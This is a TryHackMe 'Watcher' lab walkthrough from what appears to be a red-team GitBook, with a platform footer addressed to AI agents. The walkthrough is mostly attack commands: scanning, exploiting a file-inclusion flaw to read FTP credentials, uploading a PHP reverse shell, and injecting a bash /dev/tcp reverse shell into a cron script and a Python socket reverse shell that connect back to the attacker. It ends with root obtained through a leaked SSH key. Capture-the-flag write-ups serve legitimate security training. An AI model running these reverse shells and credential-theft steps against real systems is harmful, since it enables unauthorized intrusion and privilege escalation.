> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/watcher.md). # Watcher **Room Link:** ### Initial Scan **Kali**

nmap -A $VICTIM

### Scan all ports **Kali**

nmap -sV -sT -O -p 1-65535 $VICTIM

### TCP/80 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```

**Kali** ``` ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w SecLists/Discovery/Web-Content/SVNDigger/cat/Language/php.txt cat results.txt | grep -v 2422 ```

I used my wordlist of common found on [LFI / RFI](/red-team/methodologies-and-resources/cheat-sheets/lfi-rfi.md) and confirmed I can view files on the server. I did not find anything useful **Kali** ``` ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w mylist.txt cat results.txt | grep -v 2422 ```

I remembered we had that secret file as well, I was able to read it and it had some credentials for FTP.

### TCP/21 - FTP **Kali** ``` ftp $VICTIM Username:ftpuser Password: givemefiles777 ```

**Kali** ``` git clone https://github.com/pentestmonkey/php-reverse-shell.git cp php-reverse-shell/php-reverse-shell.php . nc -lvnp 1234 ``` **Kali(ftp)** ``` put php-reverse-shell.php ```

Get autocomplete ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` **Victim** ``` sudo -l ```

## Lateral Movement - mat **Victim** ``` cat /etc/crontab cd /home/toby/jobs/ sudo -u toby rm -f cow.sh sudo -u toby touch cow.sh sudo -u toby chmod 777 cow.sh echo '#!/bin/bash' > cow.sh echo 'sh -i >& /dev/tcp/$KALI/1338 0>&1' >> cow.sh ```

**Kali** ``` nc -lvnp 1338 ```

Get autocomplete ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` ## Lateral Movement - will **Victim(mat)** ``` sudo -l ```

**Kali** ``` nc -lvnp 4242 ``` **Victim(mat)** ``` cd /home/mat/scripts/ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$KALI",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > cmd.py sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1 ```

Get autocomplete ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` ## **Privilege Escalation** **Victim(will)** ``` cat /opt/backups/key.b64 ```

**Kali** ``` chmod 600 id_rsa ssh root@$VICTIM -i id_rsa ```

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/watcher.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.